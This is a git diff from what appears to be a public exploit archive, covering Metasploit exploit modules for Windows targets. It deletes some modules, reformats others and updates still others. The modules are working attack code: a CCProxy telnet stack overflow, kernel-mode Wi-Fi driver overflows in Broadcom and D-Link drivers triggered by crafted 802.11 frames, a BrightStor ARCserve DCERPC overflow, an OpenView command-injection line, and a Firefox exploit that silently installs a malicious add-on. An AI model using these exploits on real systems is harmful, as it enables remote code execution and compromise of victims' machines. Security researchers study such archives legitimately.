+ 1) - rand5 = rand_text_alpha(rand(100) + 1) - rand6 = rand_text_alpha(rand(100) + 1) - rand7 = rand_text_alpha(rand(100) + 1) - rand8 = rand_text_alpha(rand(100) + 1) + # Randomize the javascript variable names. + vname = rand_text_alpha(rand(100) + 1) + var_i = rand_text_alpha(rand(30) + 2) + rand1 = rand_text_alpha(rand(100) + 1) + rand2 = rand_text_alpha(rand(100) + 1) + rand3 = rand_text_alpha(rand(100) + 1) + rand4 = rand_text_alpha(rand(100) + 1) + rand5 = rand_text_alpha(rand(100) + 1) + rand6 = rand_text_alpha(rand(100) + 1) + rand7 = rand_text_alpha(rand(100) + 1) + rand8 = rand_text_alpha(rand(100) + 1) - content = %Q| + content = %Q| - | + | - print_status("Creating '#{datastore['FILENAME']}' file ...") + print_status("Creating '#{datastore['FILENAME']}' file ...") - file_create(content) - end + file_create(content) + end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16689.rb b/platforms/windows/remote/16689.rb deleted file mode 100755 index 13deb72e4..000000000 --- a/platforms/windows/remote/16689.rb +++ /dev/null @@ -1,87 +0,0 @@ -## -# $Id: ccproxy_telnet_ping.rb 9179 2010-04-30 08:40:19Z jduck $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = AverageRanking - - include Msf::Exploit::Remote::Tcp - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'CCProxy <= v6.2 Telnet Proxy Ping Overflow', - 'Description' => %q{ - This module exploits the YoungZSoft CCProxy <= v6.2 suite - Telnet service. The stack is overwritten when sending an overly - long address to the 'ping' command. - }, - 'Author' => [ 'Patrick Webster ' ], - 'Arch' => [ ARCH_X86 ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 9179 $', - 'References' => - [ - [ 'CVE', '2004-2416' ], - [ 'OSVDB', '11593' ], - [ 'BID', '11666 ' ], - [ 'URL', 'http://milw0rm.com/exploits/621' ], - ], - 'Privileged' => false, - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, - 'Payload' => - { - 'Space' => 1012, - 'BadChars' => "\x00\x07\x08\x0a\x0d\x20", - }, - 'Platform' => ['win'], - 'Targets' => - [ - # Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN. - [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll - [ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll - [ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll - [ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll - [ 'Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll - ], - 'DisclosureDate' => 'Nov 11 2004')) - - register_options( - [ - Opt::RPORT(23), - ], self.class) - end - - def check - connect - banner = sock.get_once(-1,3) - disconnect - - if (banner =~ /CCProxy Telnet Service Ready/) - return Exploit::CheckCode::Appears - end - return Exploit::CheckCode::Safe - end - - def exploit - connect - - sploit = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7) - sock.put(sploit + "\r\n") - - handler - disconnect - end - -end diff --git a/platforms/windows/remote/2770.rb b/platforms/windows/remote/2770.rb index 733d3d7de..8e74910e8 100755 --- a/platforms/windows/remote/2770.rb +++ b/platforms/windows/remote/2770.rb @@ -1,81 +1,90 @@ +## +# $Id: broadcom_wifi_ssid.rb 9669 2010-07-03 03:13:45Z jduck $ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' -module Msf +class Metasploit3 < Msf::Exploit::Remote + Rank = LowRanking -class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote - - include Exploit::Lorcon - include Exploit::KernelMode + include Msf::Exploit::Lorcon2 + include Msf::Exploit::KernelMode def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Broadcom Wireless Driver Probe Response SSID Overflow', 'Description' => %q{ - This module exploits a stack overflow in the Broadcom Wireless driver - that allows remote code execution in kernel mode by sending a 802.11 probe - response that contains a long SSID. The target MAC address must - be provided to use this exploit. The two cards tested fell into the - 00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges. + This module exploits a stack buffer overflow in the Broadcom Wireless driver + that allows remote code execution in kernel mode by sending a 802.11 probe + response that contains a long SSID. The target MAC address must + be provided to use this exploit. The two cards tested fell into the + 00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges. - This module depends on the Lorcon library and only works on the Linux platform - with a supported wireless card. Please see the Ruby Lorcon documentation - (external/ruby-lorcon/README) for more information. + This module depends on the Lorcon2 library and only works on the Linux platform + with a supported wireless card. Please see the Ruby Lorcon2 documentation + (external/ruby-lorcon/README) for more information. }, - - 'Authors' => + 'Author' => [ 'Chris Eagle', # initial discovery - 'Johnny Cache ', # the man with the plan + 'Johnny Cache ', # the man with the plan 'skape', # windows kernel ninjitsu and debugging 'hdm' # porting the C version to ruby ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: 3583 $', + 'Version' => '$Revision: 9669 $', 'References' => [ + ['CVE', '2006-5882'], + ['OSVDB', '30294'], ['URL', 'http://projects.info-pull.com/mokb/MOKB-11-11-2006.html'], ], 'Privileged' => true, - 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, - 'Payload' => { 'Space' => 500 }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519) [ 'Windows XP SP2 (5.1.2600.2122), bcmwl5.sys 3.50.21.10', { 'Ret' => 0x8066662c, # jmp edi 'Platform' => 'win', - 'Payload' => + 'Payload' => { - 'ExtendedOptions' => + 'ExtendedOptions' => { 'Stager' => 'sud_syscall_hook', 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 'Recovery' => 'idlethread_restart', - 'KiIdleLoopAddress' => 0x804dbb27, - + 'KiIdleLoopAddress' => 0x804dbb27, + } } - } + } ], - + # 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158) [ 'Windows XP SP2 (5.1.2600.2180), bcmwl5.sys 3.50.21.10', { 'Ret' => 0x804f16eb, # jmp edi 'Platform' => 'win', - 'Payload' => + 'Payload' => { - 'ExtendedOptions' => + 'ExtendedOptions' => { 'Stager' => 'sud_syscall_hook', 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 @@ -83,13 +92,13 @@ class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote 'KiIdleLoopAddress' => 0x804dc0c7, } } - } - ] + } + ] ], - - 'DefaultTarget' => 0 + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Nov 11 2006' )) - + register_options( [ OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']), @@ -99,102 +108,99 @@ class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote def exploit open_wifi - + stime = Time.now.to_i - + print_status("Sending beacons and responses for #{datastore['RUNTIME']} seconds...") - - while (stime + datastore['RUNTIME'].to_i > Time.now.to_i) - + + while (stime + datastore['RUNTIME'].to_i > Time.now.to_i) + select(nil, nil, nil, 0.02) wifi.write(create_response) select(nil, nil, nil, 0.01) wifi.write(create_beacon) - + break if session_created? - + end - + print_status("Finished sending frames...") end - + def create_beacon src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93 dst = eton('FF:FF:FF:FF:FF:FF') seq = [Time.now.to_i % 4096].pack('n') - + blob = create_frame blob[0,1] = 0x80.chr blob[4,6] = dst blob[10,6] = src blob[16,6] = src blob[22,2] = seq - + blob end - + def create_response src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93 dst = eton(datastore['ADDR_DST']) seq = [Time.now.to_i % 256].pack('n') - + blob = create_frame - blob[0,1] = 0x50.chr + blob[0,1] = 0x50.chr blob[4,6] = dst blob[10,6] = src - blob[16,6] = src # bssid field, good idea to set to src. + blob[16,6] = src # bssid field, good idea to set to src. blob[22,2] = seq - + blob end def create_frame "\x80" + # type/subtype "\x00" + # flags - "\x00\x00" + # duration - "\xff\xff\xff\xff\xff\xff" + # dst + "\x00\x00" + # duration + eton(datastore['ADDR_DST']) + # dst "\x58\x58\x58\x58\x58\x58" + # src "\x58\x58\x58\x58\x58\x58" + # bssid "\x70\xed" + # sequence number - + # # fixed parameters # - + # timestamp value - Rex::Text.rand_text_alphanumeric(8) + + rand_text_alphanumeric(8) + "\x64\x00" + # beacon interval "\x11\x04" + # capability flags - + # # tagged parameters # - + # ssid tag "\x00" + # tag: SSID parameter set "\x5d" + # len: length is 93 bytes - + # jump into the payload "\x89\xf9" + # mov edi, ecx "\x81\xc1\x7b\x00\x00\x00" + # add ecx, 0x7b "\xff\xe1" + # jmp ecx - + # padding - Rex::Text.rand_text_alphanumeric(79) + - + rand_text_alphanumeric(79) + + # return address [target.ret].pack('V') + - + # vendor specific tag "\xdd" + # wpa "\xff" + # big as we can make it - + # the kernel-mode stager payload.encoded end - -end -end -# milw0rm.com [2006-11-13] +end diff --git a/platforms/windows/remote/2771.rb b/platforms/windows/remote/2771.rb index 1885c9739..431ba9cff 100755 --- a/platforms/windows/remote/2771.rb +++ b/platforms/windows/remote/2771.rb @@ -1,57 +1,72 @@ +## +# $Id: dlink_wifi_rates.rb 9670 2010-07-03 03:19:07Z jduck $ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' -module Msf +class Metasploit3 < Msf::Exploit::Remote + Rank = LowRanking -class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remote - - include Exploit::Lorcon - include Exploit::KernelMode + include Msf::Exploit::Lorcon2 + include Msf::Exploit::KernelMode def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'D-Link DWL-G132 Wireless Driver Beacon Rates Overflow', 'Description' => %q{ - This module exploits a stack overflow in the A5AGU.SYS driver provided - with the D-Link DWL-G132 USB wireless adapter. This stack overflow - allows remote code execution in kernel mode. The stack overflow is triggered - when a 802.11 Beacon frame is received that contains a long Rates information - element. This exploit was tested with version 1.0.1.41 of the - A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer - versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340 - adapter and appear to resolve this flaw, but D-Link does not offer an updated - driver for the DWL-G132. Since this vulnerability is exploited via beacon frames, - all cards within range of the attack will be affected. The tested adapter used - a MAC address in the range of 00:11:95:f2:XX:XX. - - Vulnerable clients will need to have their card in a non-associated state - for this exploit to work. The easiest way to reproduce this bug is by starting - the exploit and then accessing the Windows wireless network browser and - forcing it to refresh. - - D-Link was NOT contacted about this flaw. A search of the SecurityFocus - database indicates that D-Link has not provided an official patch or - solution for any of the seven flaws listed at the time of writing: - (BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689). - - This module depends on the Lorcon library and only works on the Linux platform - with a supported wireless card. Please see the Ruby Lorcon documentation - (external/ruby-lorcon/README) for more information. + This module exploits a stack buffer overflow in the A5AGU.SYS driver provided + with the D-Link DWL-G132 USB wireless adapter. This stack buffer overflow + allows remote code execution in kernel mode. The stack buffer overflow is triggered + when a 802.11 Beacon frame is received that contains a long Rates information + element. This exploit was tested with version 1.0.1.41 of the + A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer + versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340 + adapter and appear to resolve this flaw, but D-Link does not offer an updated + driver for the DWL-G132. Since this vulnerability is exploited via beacon frames, + all cards within range of the attack will be affected. The tested adapter used + a MAC address in the range of 00:11:95:f2:XX:XX. + + Vulnerable clients will need to have their card in a non-associated state + for this exploit to work. The easiest way to reproduce this bug is by starting + the exploit and then accessing the Windows wireless network browser and + forcing it to refresh. + + D-Link was NOT contacted about this flaw. A search of the SecurityFocus + database indicates that D-Link has not provided an official patch or + solution for any of the seven flaws listed at the time of writing: + (BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689). + + As of November 17th, 2006, D-Link has fixed the flaw it the latest version of the + DWL-G132 driver (v1.21). + + This module depends on the Lorcon2 library and only works on the Linux platform + with a supported wireless card. Please see the Ruby Lorcon2 documentation + (external/ruby-lorcon/README) for more information. }, - - 'Authors' => + 'Author' => [ 'hdm', # discovery, exploit dev 'skape', # windows kernel ninjitsu - 'Johnny Cache ' # making all of this possible + 'Johnny Cache ' # making all of this possible ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: 3583 $', + 'Version' => '$Revision: 9670 $', 'References' => [ + ['CVE', '2006-6055'], + ['OSVDB', '30296'], + ['URL', 'http://projects.info-pull.com/mokb/MOKB-13-11-2006.html'], ['URL', 'ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip'], ], 'Privileged' => true, - + 'DefaultOptions' => { 'EXITFUNC' => 'thread', @@ -63,7 +78,7 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot 'Space' => 1000 }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # Windows XP SP2 with the latest updates # 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519) @@ -71,9 +86,9 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot { 'Ret' => 0x8066662c, # jmp edi 'Platform' => 'win', - 'Payload' => + 'Payload' => { - 'ExtendedOptions' => + 'ExtendedOptions' => { 'Stager' => 'sud_syscall_hook', 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 @@ -81,18 +96,18 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot 'KiIdleLoopAddress' => 0x804dbb27, } } - } + } ], - + # Windows XP SP2 install media, no patches # 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158) [ 'Windows XP SP2 (5.1.2600.2180), A5AGU.sys 1.0.1.41', { 'Ret' => 0x804f16eb, # jmp edi 'Platform' => 'win', - 'Payload' => + 'Payload' => { - 'ExtendedOptions' => + 'ExtendedOptions' => { 'Stager' => 'sud_syscall_hook', 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 @@ -100,72 +115,73 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot 'KiIdleLoopAddress' => 0x804dc0c7, } } - } - ] + } + ] ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Nov 13 2006')) - - 'DefaultTarget' => 0 - )) - register_options( [ OptString.new('ADDR_DST', [ true, "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']), OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]) ], self.class) end - + def exploit open_wifi - + stime = Time.now.to_i rtime = datastore['RUNTIME'].to_i count = 0 - + print_status("Sending exploit beacons for #{datastore['RUNTIME']} seconds...") - while (stime + rtime > Time.now.to_i) + while (stime + rtime > Time.now.to_i) wifi.write(create_beacon) select(nil, nil, nil, 0.10) if (count % 100 == 0) - + count += 1 - + # Exit if we get a session break if session_created? end - + print_status("Completed sending beacons.") end +# +# The following research was provided by Gil Dabah of ZERT # # The long rates field bug can be triggered three different ways (at least): # 1) Send a single rates IE with valid rates up front and long data -# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data (thanks gil!) +# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data # 3) Send two IE rates fields, with the second one containing the long data (this exploit) # + def create_beacon - ssid = Rex::Text.rand_text_alphanumeric(6) - bssid = ("\x00" * 2) + Rex::Text.rand_text(4) + ssid = rand_text_alphanumeric(6) + bssid = ("\x00" * 2) + rand_text(4) src = ("\x90" * 4) + "\xeb\x2b" seq = [rand(255)].pack('n') - buff = Rex::Text.rand_text(75) + buff = rand_text(75) buff[0, 2] = "\xeb\x49" buff[71, 4] = [target.ret].pack('V') - + frame = "\x80" + # type/subtype "\x00" + # flags - "\x00\x00" + # duration - "\xff\xff\xff\xff\xff\xff" + # dst + "\x00\x00" + # duration + eton(datastore['ADDR_DST']) + # dst src + # src - bssid + # bssid - seq + # seq - Rex::Text.rand_text(8) + # timestamp value + bssid + # bssid + seq + # seq + rand_text(8) + # timestamp value "\x64\x00" + # beacon interval "\x00\x05" + # capability flags - + # ssid tag "\x00" + ssid.length.chr + ssid + @@ -176,14 +192,11 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot "\x03" + "\x01" + channel.chr + # eip was his name-o - "\x01" + buff.length.chr + buff + + "\x01" + buff.length.chr + buff + payload.encoded - + return frame end end -end - -# milw0rm.com [2006-11-13] diff --git a/platforms/windows/remote/28188.rb b/platforms/windows/remote/28188.rb index e2e9e158c..b6bc3bf79 100755 --- a/platforms/windows/remote/28188.rb +++ b/platforms/windows/remote/28188.rb @@ -128,9 +128,9 @@ class Metasploit3 < Msf::Exploit::Remote # due to the fake activation). But this line also will kill other cscript # legit processes which could be running on the target host. Because of it # the exploit has a Manual ranking - command = ""127.0.0.1 && " - command << cmd.gsub(/&/, "&") - command << " && taskkill /F /IM cscript.exe "" + command = ""127.0.0.1 && " + command << cmd.gsub(/&/, "&") + command << " && taskkill /F /IM cscript.exe "" res = send_soap_request("OPCACTIVATE", "omHost", command) diff --git a/platforms/windows/remote/28480.rb b/platforms/windows/remote/28480.rb deleted file mode 100755 index d0623107e..000000000 --- a/platforms/windows/remote/28480.rb +++ /dev/null @@ -1,92 +0,0 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - - Rank = AverageRanking - - include Msf::Exploit::Remote::DCERPC - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow', - 'Description' => %q{ - This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup - r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow - the buffer and execute arbitrary code. - }, - 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'OSVDB', '68330'], - [ 'URL', 'http://www.metasploit.com/users/mc' ], - ], - 'Privileged' => true, - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, - 'Payload' => - { - 'Space' => 500, - 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e", - 'StackAdjustment' => -3500, - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'BrightStor ARCserve r11.5/Windows 2003', { 'Ret' => 0x28eb6493 } ], - ], - 'DisclosureDate' => 'Oct 4 2010', - 'DefaultTarget' => 0)) - - register_options([ Opt::RPORT(6502) ], self.class) - end - - def exploit - - connect - - handle = dcerpc_handle('62b93df0-8b02-11ce-876c-00805f842837', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) - print_status("Binding to #{handle} ...") - - dcerpc_bind(handle) - print_status("Bound to #{handle} ...") - - request = "\x00\x04\x08\x0c\x05\x00\x00\x00\x00\x00" - request << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - - dcerpc.call(0x2B, request) - - sploit = NDR.long(4) - sploit << NDR.string(rand_text_alpha_upper(1002) + [target.ret].pack('V') + payload.encoded + "\x00") - - print_status("Trying target #{target.name}...") - - begin - dcerpc_call(0x8A, sploit) - rescue Rex::Proto::DCERPC::Exceptions::NoResponse - end - - handler - disconnect - - end - -end -=begin -/* opcode: 0x8A, address: 0x100707D0 */ - -long sub_100707D0 ( - [in] handle_t arg_1, - [in] long arg_2, - [in][ref][string] char * arg_3 -); -=end \ No newline at end of file diff --git a/platforms/windows/remote/30474.rb b/platforms/windows/remote/30474.rb deleted file mode 100755 index 55410ca7d..000000000 --- a/platforms/windows/remote/30474.rb +++ /dev/null @@ -1,116 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::BrowserExploitServer - include Msf::Exploit::EXE - include Msf::Exploit::Remote::FirefoxAddonGenerator - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution', - 'Description' => %q{ - On versions of Firefox from 5.0 to 15.0.1, the InstallTrigger global, when given - invalid input, would throw an exception that did not have an __exposedProps__ - property set. By re-setting this property on the exception object's prototype, - the chrome-based defineProperty method is made available. - - With the defineProperty method, functions belonging to window and document can be - overriden with a function that gets called from chrome-privileged context. From here, - another vulnerability in the crypto.generateCRMFRequest function is used to "peek" - into the context's private scope. Since the window does not have a chrome:// URL, - the insecure parts of Components.classes are not available, so instead the AddonManager - API is invoked to silently install a malicious plugin. - }, - 'License' => MSF_LICENSE, - 'Author' => [ - 'Mariusz Mlynski', # discovered CVE-2012-3993 - 'moz_bug_r_a4', # discovered CVE-2013-1710 - 'joev' # metasploit module - ], - 'DisclosureDate' => "Aug 6 2013", - 'References' => [ - ['CVE', '2012-3993'], # used to install function that gets called from chrome:// (ff<15) - ['OSVDB', '86111'], - ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=768101'], - ['CVE', '2013-1710'], # used to peek into privileged caller's closure (ff<23) - ['OSVDB', '96019'] - ], - 'BrowserRequirements' => { - :source => 'script', - :ua_name => HttpClients::FF, - :ua_ver => lambda { |ver| ver.to_i.between?(5, 15) } - } - )) - - register_options([ - OptString.new('CONTENT', [ false, "Content to display inside the HTML .", '' ] ) - ], self.class) - end - - def on_request_exploit(cli, request, target_info) - if request.uri.match(/\.xpi$/i) - print_status("Sending the malicious addon") - send_response(cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' }) - else - print_status("Sending HTML") - send_response_html(cli, generate_html(target_info)) - end - end - - def generate_html(target_info) - injection = if target_info[:ua_ver].to_i == 15 - "Function.prototype.call.call(p.__defineGetter__,obj,key,runme);" - else - "p2.constructor.defineProperty(obj,key,{get:runme});" - end - - %Q| - - - #{datastore['CONTENT']} - - - - - | - end -end \ No newline at end of file diff --git a/platforms/windows/remote/4360.rb b/platforms/windows/remote/4360.rb index cf80569c5..13deb72e4 100755 --- a/platforms/windows/remote/4360.rb +++ b/platforms/windows/remote/4360.rb @@ -1,110 +1,82 @@ ## -# $Id$ +# $Id: ccproxy_telnet_ping.rb 9179 2010-04-30 08:40:19Z jduck $ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/projects/Framework/ +# http://metasploit.com/framework/ ## require 'msf/core' -module Msf +class Metasploit3 < Msf::Exploit::Remote + Rank = AverageRanking -class Exploits::Windows::Proxy::CCProxy_Telnet_Ping < Msf::Exploit::Remote - - include Exploit::Remote::Tcp + include Msf::Exploit::Remote::Tcp - def initialize(info = {}) - super(update_info(info, + def initialize(info = {}) + super(update_info(info, 'Name' => 'CCProxy <= v6.2 Telnet Proxy Ping Overflow', 'Description' => %q{ - This module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet service. - The stack is overwritten when sending an overly long address to the 'ping' command. + This module exploits the YoungZSoft CCProxy <= v6.2 suite + Telnet service. The stack is overwritten when sending an overly + long address to the 'ping' command. }, 'Author' => [ 'Patrick Webster ' ], - 'Arch' => [ ARCH_X86 ], + 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', + 'Version' => '$Revision: 9179 $', 'References' => - [ - [ 'BID', '11666 ' ], - [ 'CVE', '2004-2416' ], - [ 'MIL', '621' ], - [ 'OSVDB', '11593' ], - ], + [ + [ 'CVE', '2004-2416' ], + [ 'OSVDB', '11593' ], + [ 'BID', '11666 ' ], + [ 'URL', 'http://milw0rm.com/exploits/621' ], + ], 'Privileged' => false, 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, + { + 'EXITFUNC' => 'thread', + }, 'Payload' => - { + { 'Space' => 1012, - 'BadChars' => "\x00\x07\x08\x0a\x0d", + 'BadChars' => "\x00\x07\x08\x0a\x0d\x20", }, 'Platform' => ['win'], 'Targets' => - [ - # Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN. [ - 'Windows 2000 Pro All - English', - { - 'Ret' => 0x75023411, # call esi ws2help.dll - } + # Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN. + [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll + [ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll + [ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll + [ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll + [ 'Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll ], - [ - 'Windows 2000 Pro All - Italian', - { - 'Ret' => 0x74fd2b81, # call esi ws2help.dll - } - ], - [ - 'Windows 2000 Pro All - French', - { - 'Ret' => 0x74fa2b22, # call esi ws2help.dll - } - ], - [ - 'Windows XP SP0/1 - English', - { - 'Ret' => 0x71aa1a97, # call esi ws2help.dll - } - ], - [ - 'Windows XP SP2 - English', - { - 'Ret' => 0x71aa1b22, # call esi ws2help.dll - } - ], - ], 'DisclosureDate' => 'Nov 11 2004')) - - register_options( + + register_options( [ Opt::RPORT(23), ], self.class) end - def autofilter - false - end - - def check + def check connect banner = sock.get_once(-1,3) + disconnect if (banner =~ /CCProxy Telnet Service Ready/) - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Appears end - return Exploit::CheckCode::Safe + return Exploit::CheckCode::Safe end def exploit connect - + sploit = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7) sock.put(sploit + "\r\n") @@ -113,6 +85,3 @@ class Exploits::Windows::Proxy::CCProxy_Telnet_Ping < Msf::Exploit::Remote end end -end - -# milw0rm.com [2007-09-03]